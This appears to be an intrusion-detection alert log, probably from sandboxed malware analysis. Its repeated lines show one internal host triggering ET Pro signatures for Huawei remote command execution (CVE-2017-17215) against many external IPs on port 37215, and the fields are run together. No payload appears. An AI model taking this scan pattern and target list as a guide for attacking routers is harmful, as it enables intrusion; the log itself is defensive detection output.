                                            06/14/24-10:44:20.803302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3950437215192.168.2.14156.130.139.187
                                            06/14/24-10:44:20.803270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4643037215192.168.2.1441.59.124.117
                                            06/14/24-10:44:26.977416TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3568837215192.168.2.14156.124.154.153
                                            06/14/24-10:44:06.453478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5734637215192.168.2.1441.18.54.89
                                            06/14/24-10:44:12.614303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5141237215192.168.2.1441.89.23.222
                                            06/14/24-10:43:36.724192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4929037215192.168.2.1441.221.232.180
                                            06/14/24-10:44:31.051405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3956437215192.168.2.14197.145.30.88
                                            06/14/24-10:44:22.860099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5016437215192.168.2.1441.128.79.240
                                            06/14/24-10:44:24.942761TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5142437215192.168.2.14197.28.229.143
                                            06/14/24-10:44:33.134497TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5684837215192.168.2.14197.82.2.54
                                            06/14/24-10:44:02.366931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5480437215192.168.2.14197.104.30.118
                                            06/14/24-10:43:37.762600TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4687037215192.168.2.14156.17.199.69
                                            06/14/24-10:43:56.230262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5188837215192.168.2.1441.232.78.50
                                            06/14/24-10:43:34.663735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5415837215192.168.2.14197.75.9.62
                                            06/14/24-10:43:36.729152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5416437215192.168.2.14197.229.250.17
                                            06/14/24-10:43:45.992430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3897637215192.168.2.14197.173.129.90
                                            06/14/24-10:43:43.941675TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4637037215192.168.2.14197.111.7.31
                                            06/14/24-10:44:31.078504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4131237215192.168.2.14156.248.95.229
                                            06/14/24-10:43:56.226886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4010837215192.168.2.1441.127.234.34
                                            06/14/24-10:43:43.967532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3472437215192.168.2.14156.168.61.191
                                            06/14/24-10:43:48.034769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4109037215192.168.2.1441.132.102.146
                                            06/14/24-10:44:16.716930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6004237215192.168.2.14197.141.146.162
                                            06/14/24-10:43:43.944359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5306037215192.168.2.14156.127.10.35
                                            06/14/24-10:44:26.979135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3320637215192.168.2.1441.184.251.154
                                            06/14/24-10:43:37.761325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3931037215192.168.2.14156.241.179.8
                                            06/14/24-10:43:34.679090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3542837215192.168.2.14156.230.56.126
                                            06/14/24-10:44:04.422241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4289437215192.168.2.14197.76.92.18
                                            06/14/24-10:44:20.806635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4720837215192.168.2.14156.246.178.4
                                            06/14/24-10:44:04.410627TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5287437215192.168.2.1441.211.161.189
                                            06/14/24-10:43:34.676115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5448037215192.168.2.14156.122.69.214
                                            06/14/24-10:44:16.733378TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3963637215192.168.2.14197.45.99.61
                                            06/14/24-10:43:54.202482TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4874437215192.168.2.14197.111.134.179
                                            06/14/24-10:43:45.987936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4932837215192.168.2.14156.103.141.216
                                            06/14/24-10:43:43.944576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4494637215192.168.2.1441.21.199.194
                                            06/14/24-10:43:58.292162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3574237215192.168.2.14156.13.115.33
                                            06/14/24-10:44:06.470007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4974837215192.168.2.1441.188.226.204
                                            06/14/24-10:44:35.182386TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5149637215192.168.2.14197.177.205.245
                                            06/14/24-10:44:20.830840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3650237215192.168.2.1441.139.22.19
                                            06/14/24-10:44:22.880805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3331037215192.168.2.14156.181.42.3
                                            06/14/24-10:43:34.676161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4675037215192.168.2.14197.163.24.189
                                            06/14/24-10:43:37.759656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5961837215192.168.2.14156.94.35.254
                                            06/14/24-10:44:20.831545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5715437215192.168.2.14197.86.190.28
                                            06/14/24-10:43:34.676820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3545837215192.168.2.1441.206.192.149
                                            06/14/24-10:43:54.183260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5135037215192.168.2.14197.32.161.38
                                            06/14/24-10:44:31.087200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3350237215192.168.2.1441.221.84.219
                                            06/14/24-10:43:34.661855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4543837215192.168.2.1441.103.250.3
                                            06/14/24-10:43:43.967660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3953237215192.168.2.14197.0.122.212
                                            06/14/24-10:44:10.565968TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5521637215192.168.2.1441.121.160.83
                                            06/14/24-10:44:06.470962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4834237215192.168.2.1441.58.96.139
                                            06/14/24-10:44:12.617344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5035237215192.168.2.14156.144.132.97
                                            06/14/24-10:44:06.449309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4801837215192.168.2.1441.201.37.27
                                            06/14/24-10:43:58.290573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3914637215192.168.2.14156.220.149.142
                                            06/14/24-10:44:24.913659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3862437215192.168.2.14156.153.251.6
                                            06/14/24-10:43:58.277551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6013037215192.168.2.1441.230.7.16
                                            06/14/24-10:44:31.053852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5806437215192.168.2.14197.119.71.129
                                            06/14/24-10:43:36.705099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4208237215192.168.2.14197.12.153.202
                                            06/14/24-10:44:12.617779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3608637215192.168.2.1441.100.161.178
                                            06/14/24-10:44:26.977647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3285837215192.168.2.14197.146.46.40
                                            06/14/24-10:44:26.978725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6077637215192.168.2.14156.155.240.183
                                            06/14/24-10:43:36.701029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5094637215192.168.2.14197.60.130.53
                                            06/14/24-10:44:33.134521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5989037215192.168.2.14197.21.2.221
                                            06/14/24-10:43:39.811361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3844037215192.168.2.14156.223.13.28
                                            06/14/24-10:44:12.625266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3419637215192.168.2.14197.68.240.73
                                            06/14/24-10:44:16.714950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5314837215192.168.2.1441.102.234.236
                                            06/14/24-10:44:08.503406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5576037215192.168.2.1441.141.128.160
                                            06/14/24-10:44:31.054344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3788637215192.168.2.14156.156.20.215
                                            06/14/24-10:44:29.022302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5744837215192.168.2.14197.245.53.129
                                            06/14/24-10:43:52.146231TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6025437215192.168.2.14156.132.79.164
                                            06/14/24-10:44:24.934237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5669837215192.168.2.14197.113.141.205
                                            06/14/24-10:44:10.569363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4282637215192.168.2.14156.208.130.201
                                            06/14/24-10:43:36.726481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5470637215192.168.2.1441.98.9.92
                                            06/14/24-10:43:48.046063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4507437215192.168.2.1441.251.220.57
                                            06/14/24-10:44:24.943085TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4912837215192.168.2.14156.206.34.243
                                            06/14/24-10:44:26.999297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4803037215192.168.2.14197.226.125.236
                                            06/14/24-10:43:58.277067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3641237215192.168.2.14197.161.161.248
                                            06/14/24-10:44:26.986350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5161837215192.168.2.1441.161.142.44
                                            06/14/24-10:44:20.805690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4344637215192.168.2.14197.191.32.41
                                            06/14/24-10:44:18.765097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3679437215192.168.2.14156.168.100.165
                                            06/14/24-10:44:24.914076TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4905837215192.168.2.14156.36.255.0
                                            06/14/24-10:44:29.014321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4120037215192.168.2.1441.146.175.115
                                            06/14/24-10:44:29.014085TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5600237215192.168.2.1441.217.212.149
                                            06/14/24-10:44:16.718368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4837837215192.168.2.1441.129.182.64
                                            06/14/24-10:43:39.792539TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3462237215192.168.2.1441.88.88.75
                                            06/14/24-10:44:31.083657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4460437215192.168.2.1441.85.244.250
                                            06/14/24-10:43:48.033695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5683237215192.168.2.14156.181.194.146
                                            06/14/24-10:44:06.453374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3821237215192.168.2.1441.121.91.16
                                            06/14/24-10:44:29.012593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3847837215192.168.2.14156.147.66.243
                                            06/14/24-10:43:50.072286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5483037215192.168.2.14197.198.187.169
                                            06/14/24-10:43:58.293145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3550837215192.168.2.14197.245.12.167
                                            06/14/24-10:44:06.470061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4468237215192.168.2.14156.231.233.31
                                            06/14/24-10:43:37.762320TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3402237215192.168.2.1441.108.17.49
                                            06/14/24-10:43:54.200819TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5882237215192.168.2.14156.181.254.169
                                            06/14/24-10:43:37.762373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4206837215192.168.2.14197.74.56.98
                                            06/14/24-10:44:14.681769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5784437215192.168.2.14197.71.174.224
                                            06/14/24-10:44:04.412277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5964837215192.168.2.1441.204.124.195
                                            06/14/24-10:44:10.565436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3819037215192.168.2.14197.8.146.25
                                            06/14/24-10:44:06.472372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4832037215192.168.2.14156.236.36.53
                                            06/14/24-10:44:24.944602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3759437215192.168.2.14197.0.156.179
                                            06/14/24-10:43:37.761506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4433237215192.168.2.14197.224.153.39
                                            06/14/24-10:43:37.762143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5154437215192.168.2.14197.111.207.188
                                            06/14/24-10:44:18.762621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4161037215192.168.2.14197.115.217.224
                                            06/14/24-10:43:50.115463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5470437215192.168.2.1441.247.215.208
                                            06/14/24-10:44:18.762814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3616837215192.168.2.14197.9.71.186
                                            06/14/24-10:43:43.971616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5191437215192.168.2.1441.194.89.158
                                            06/14/24-10:43:43.944441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4259437215192.168.2.1441.248.141.248
                                            06/14/24-10:43:56.230841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5300637215192.168.2.14197.200.213.184
                                            06/14/24-10:43:39.789741TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5719437215192.168.2.14197.21.25.29
                                            06/14/24-10:44:10.564573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6031037215192.168.2.14156.42.126.78
                                            06/14/24-10:43:39.789851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4612037215192.168.2.14197.104.114.163
                                            06/14/24-10:43:41.905018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3743437215192.168.2.1441.97.77.117
                                            06/14/24-10:44:29.012569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5941437215192.168.2.1441.189.14.229
                                            06/14/24-10:44:33.149063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4218837215192.168.2.1441.190.235.80
                                            06/14/24-10:43:52.161512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5603437215192.168.2.1441.72.235.200
                                            06/14/24-10:43:50.115251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4005437215192.168.2.14197.14.173.230
                                            06/14/24-10:43:50.074879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5601037215192.168.2.1441.110.126.102
                                            06/14/24-10:44:02.383328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5429437215192.168.2.1441.127.223.227
                                            06/14/24-10:44:22.878578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4846037215192.168.2.14197.110.204.129
                                            06/14/24-10:43:34.662346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4120837215192.168.2.14197.244.221.110
                                            06/14/24-10:43:45.969296TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5358437215192.168.2.14156.109.134.1
                                            06/14/24-10:44:14.671648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4322837215192.168.2.14156.124.112.115
                                            06/14/24-10:43:45.991720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5711037215192.168.2.14156.211.218.206
                                            06/14/24-10:44:29.012430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5053837215192.168.2.14197.248.192.249
                                            06/14/24-10:44:22.882131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6022237215192.168.2.14156.23.183.8
                                            06/14/24-10:44:10.545944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5483237215192.168.2.1441.111.175.214
                                            06/14/24-10:43:56.245569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4865037215192.168.2.14156.130.243.214
                                            06/14/24-10:43:48.028594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3843437215192.168.2.14156.252.214.223
                                            06/14/24-10:43:43.943730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5722237215192.168.2.1441.72.161.107
                                            06/14/24-10:43:56.225534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5595437215192.168.2.14156.46.194.23
                                            06/14/24-10:43:54.186506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4652037215192.168.2.14197.115.63.233
                                            06/14/24-10:44:02.365096TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5782837215192.168.2.1441.247.14.12
                                            06/14/24-10:43:52.165227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3370237215192.168.2.1441.223.70.94
                                            06/14/24-10:43:48.021690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5446437215192.168.2.1441.2.34.234
                                            06/14/24-10:44:26.980464TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5463437215192.168.2.14197.222.169.123
                                            06/14/24-10:43:34.677276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3566437215192.168.2.14156.70.154.169
                                            06/14/24-10:43:48.020900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4860437215192.168.2.14156.69.181.229
                                            06/14/24-10:44:10.544404TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4676037215192.168.2.14197.93.61.171
                                            06/14/24-10:43:39.792475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4191437215192.168.2.14156.228.153.200
                                            06/14/24-10:44:20.804668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4177837215192.168.2.1441.119.230.45
                                            06/14/24-10:43:39.790792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3366237215192.168.2.1441.244.186.25
                                            06/14/24-10:44:10.546904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4608237215192.168.2.14197.66.123.23
                                            06/14/24-10:44:14.673161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4414437215192.168.2.14156.202.24.45
                                            06/14/24-10:43:34.663034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4260437215192.168.2.1441.219.214.89
                                            06/14/24-10:44:08.503957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3745837215192.168.2.14156.235.138.47
                                            06/14/24-10:44:24.941620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5868837215192.168.2.14156.134.157.204
                                            06/14/24-10:44:14.672329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4932637215192.168.2.1441.100.77.85
                                            06/14/24-10:43:39.790611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5590637215192.168.2.14197.240.173.141
                                            06/14/24-10:44:22.878032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3427837215192.168.2.14197.224.22.35
                                            06/14/24-10:44:02.381126TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3427437215192.168.2.1441.88.233.156
                                            06/14/24-10:44:08.518534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4650837215192.168.2.1441.105.208.88
                                            06/14/24-10:44:29.011762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3561037215192.168.2.14156.58.11.136
                                            06/14/24-10:44:04.423405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4489837215192.168.2.14197.133.196.209
                                            06/14/24-10:43:56.229845TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4911037215192.168.2.14156.163.186.239
                                            06/14/24-10:44:26.978584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3580837215192.168.2.1441.66.27.217
                                            06/14/24-10:44:20.831635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5597437215192.168.2.14197.132.75.237
                                            06/14/24-10:44:18.766014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3928837215192.168.2.14156.125.116.7
                                            06/14/24-10:43:50.111857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5814437215192.168.2.14197.79.180.239
                                            06/14/24-10:43:58.288660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4953437215192.168.2.14156.201.121.159
                                            06/14/24-10:43:39.813478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5400837215192.168.2.14197.102.175.56
                                            06/14/24-10:43:52.149329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5787837215192.168.2.14197.166.106.201
                                            06/14/24-10:44:00.342052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4755237215192.168.2.1441.137.222.253
                                            06/14/24-10:43:50.070755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5708237215192.168.2.14156.91.88.69
                                            06/14/24-10:43:36.704189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6000637215192.168.2.1441.158.221.77
                                            06/14/24-10:44:16.732616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3396637215192.168.2.14197.220.41.135
                                            06/14/24-10:44:29.022972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3858437215192.168.2.14197.154.250.209
                                            06/14/24-10:43:50.111642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5484237215192.168.2.1441.90.109.93
                                            06/14/24-10:44:10.548471TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5423837215192.168.2.14197.120.139.100
                                            06/14/24-10:43:56.228702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4705437215192.168.2.14197.42.253.204
                                            06/14/24-10:44:16.718560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6085237215192.168.2.14156.212.58.87
                                            06/14/24-10:44:08.501600TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3985637215192.168.2.14197.209.136.193
                                            06/14/24-10:44:20.806672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3466237215192.168.2.1441.225.42.223
                                            06/14/24-10:44:29.010924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4740237215192.168.2.14156.39.204.197
                                            06/14/24-10:44:31.086865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4562237215192.168.2.14197.201.232.187
                                            06/14/24-10:43:39.811669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5004037215192.168.2.14197.27.2.64
                                            06/14/24-10:43:56.242473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5072437215192.168.2.14156.25.236.161
                                            06/14/24-10:44:12.618453TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4748837215192.168.2.1441.160.228.255
                                            06/14/24-10:43:34.661427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3598837215192.168.2.1441.216.220.242
                                            06/14/24-10:44:22.882169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5304437215192.168.2.1441.174.193.182
                                            06/14/24-10:43:54.202426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4264237215192.168.2.14197.234.174.183
                                            06/14/24-10:44:22.877967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5103437215192.168.2.14156.117.224.169
                                            06/14/24-10:43:54.201970TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3843437215192.168.2.14156.70.190.19
                                            06/14/24-10:44:35.182194TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4388437215192.168.2.1441.126.44.150
                                            06/14/24-10:43:52.143601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5403037215192.168.2.1441.137.18.0
                                            06/14/24-10:43:56.242806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5456037215192.168.2.1441.61.228.180
                                            06/14/24-10:44:29.027676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4530237215192.168.2.14197.73.203.236
                                            06/14/24-10:43:41.897246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4408237215192.168.2.1441.198.151.33
                                            06/14/24-10:43:43.942236TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4266237215192.168.2.14197.23.118.124
                                            06/14/24-10:44:35.177664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3736837215192.168.2.1441.213.188.12
                                            06/14/24-10:43:39.792758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4407837215192.168.2.14197.19.65.244
